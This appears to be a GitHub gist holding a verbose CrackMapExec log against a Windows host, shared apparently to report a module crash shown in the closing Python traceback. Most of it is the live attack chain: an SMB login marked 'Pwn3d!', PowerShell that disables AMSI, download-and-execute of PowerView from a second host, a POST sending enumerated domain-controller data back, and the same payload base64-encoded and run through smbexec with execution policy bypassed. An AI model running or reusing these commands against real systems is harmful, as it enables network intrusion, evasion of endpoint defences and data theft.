Created
April 24, 2017 16:13
-
-
Save cclements/9d5760c0d4507d4f41301dbf35478b74 to your computer and use it in GitHub Desktop.
net_domaincontroller
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cme --verbose smb 1.2.3.4 -u someuser -p somepassword -M get_netdomaincontroller | |
DEBUG Passed args: | |
{'content': False, | |
'cred_id': [], | |
'darrell': False, | |
'depth': None, | |
'disks': False, | |
'domain': None, | |
'exclude_dirs': '', | |
'exec_method': None, | |
'execute': None, | |
'fail_limit': None, | |
'force_ps32': False, | |
'gen_relay_list': None, | |
'gfail_limit': None, | |
'groups': None, | |
'hash': [], | |
'jitter': None, | |
'list_modules': False, | |
'local_auth': False, | |
'local_groups': None, | |
'loggedon_users': False, | |
'lsa': False, | |
'module': 'get_netdomaincontroller', | |
'module_options': [], | |
'no_output': False, | |
'ntds': None, | |
'only_files': False, | |
'pass_pol': False, | |
'password': ['somepassword'], | |
'pattern': None, | |
'protocol': 'smb', | |
'ps_execute': None, | |
'regex': None, | |
'rid_brute': None, | |
'sam': False, | |
'server': 'https', | |
'server_host': '0.0.0.0', | |
'server_port': None, | |
'sessions': False, | |
'share': 'C$', | |
'shares': False, | |
'show_module_options': False, | |
'smb_port': 445, | |
'spider': None, | |
'spider_folder': '.', | |
'target': ['1.2.3.4'], | |
'threads': 100, | |
'timeout': None, | |
'ufail_limit': None, | |
'username': ['someuser'], | |
'users': None, | |
'verbose': True, | |
'wmi': None, | |
'wmi_namespace': 'root\\cimv2'} | |
DEBUG CME server type: https | |
SMB 1.2.3.4 445 TARGET-HOST [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:TARGET-HOST) (domain:TARGET-DOMAIN) (signing:False) | |
DEBUG add_credential(credtype=plaintext, domain=TARGET-DOMAIN, username=someuser, password=somepassword, groupid=None, pillaged_from=None) => None | |
SMB 1.2.3.4 445 TARGET-HOST [+] TARGET-DOMAIN\someuser:somepassword (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://1.2.3.5:443/PowerView.ps1') | |
$cmd = Get-NetDomainController | select Name,Domain,IPAddress | Out-String | |
$request = [System.Net.WebRequest]::Create('https://1.2.3.5:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://1.2.3.5:443/PowerView.ps1') | |
$cmd = Get-NetDomainController | select Name,Domain,IPAddress | Out-String | |
$request = [System.Net.WebRequest]::Create('https://1.2.3.5:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Starting SMB server | |
DEBUG Config file parsed | |
DEBUG Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 | |
DEBUG Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 | |
DEBUG Config file parsed | |
DEBUG Config file parsed | |
DEBUG Config file parsed | |
DEBUG StringBinding ncacn_np:1.2.3.4[\pipe\svcctl] | |
DEBUG Executed command via smbexec | |
DEBUG Hosting batch file with command: %COMSPEC% /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMAAwAC4AMQAyADgAOgA0ADQAMwAvAFAAbwB3AGUAcgBWAGkAZQB3AC4AcABzADEAJwApAAoAJABjAG0AZAAgAD0AIABHAGUAdAAtAE4AZQB0AEQAbwBtAGEAaQBuAEMAbwBuAHQAcgBvAGwAbABlAHIAIAB8ACAAcwBlAGwAZQBjAHQAIABOAGEAbQBlACwARABvAG0AYQBpAG4ALABJAFAAQQBkAGQAcgBlAHMAcwAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnAAoAJAByAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwADAALgAxADIAOAA6ADQANAAzAC8AJwApAAoAJAByAGUAcQB1AGUAcwB0AC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBhAHAAcABsAGkAYwBhAHQAaQBvAG4ALwB4AC0AdwB3AHcALQBmAG8AcgBtAC0AdQByAGwAZQBuAGMAbwBkAGUAZAAnAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJABjAG0AZAApAAoAJAByAGUAcQB1AGUAcwB0AC4AQwBvAG4AdABlAG4AdABMAGUAbgBnAHQAaAAgAD0AIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtACAAPQAgACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQAKACQAcgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAkAHIAZQBxAHUAZQBzAHQALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAA==" | |
DEBUG Command to execute: %COMSPEC% /Q /c \\1.2.3.5\FKFCL\EDSUpQ.bat | |
DEBUG Incoming connection (1.2.3.4,59101) | |
DEBUG AUTHENTICATE_MESSAGE (TARGET-DOMAIN\TARGET-HOST$,TARGET-HOST) | |
DEBUG User TARGET-HOST$\TARGET-HOST authenticated successfully | |
DEBUG TARGET-HOST$::TARGET-DOMAIN:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
GET_NETD... 1.2.3.4 [*] - - "GET /PowerView.ps1 HTTP/1.1" 200 - | |
DEBUG Disconnecting Share(1:IPC$) | |
DEBUG Disconnecting Share(2:FKFCL) | |
GET_NETD... 1.2.3.4 [*] - - "POST / HTTP/1.1" 200 - | |
GET_NETD... 1.2.3.4 Hostname: DC01 Domain: TARGET-DOMAINRC IP: 192.168.0.9 | |
GET_NETD... 1.2.3.4 Hostname: DC02 Domain: TARGET-DOMAINRC IP: 192.168.0.10 | |
---------------------------------------- | |
Exception happened during processing of request from ('1.2.3.4', 59108) | |
Traceback (most recent call last): | |
File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock | |
self.process_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request | |
self.finish_request(request, client_address) | |
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request | |
self.RequestHandlerClass(request, client_address, self) | |
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ | |
self.handle() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/get_netdomaincontroller.py", line 72, in on_response | |
hostname, domain, ip = filter(None, line.strip().split(' ')) | |
ValueError: need more than 2 values to unpack | |
---------------------------------------- | |
DEBUG AUTHENTICATE_MESSAGE (TARGET-DOMAIN\TARGET-HOST$,TARGET-HOST) | |
DEBUG User TARGET-HOST$\TARGET-HOST authenticated successfully | |
DEBUG TARGET-HOST$::TARGET-DOMAIN:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx | |
GET_NETD... 1.2.3.4 445 TARGET-HOST [+] Executed launcher |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment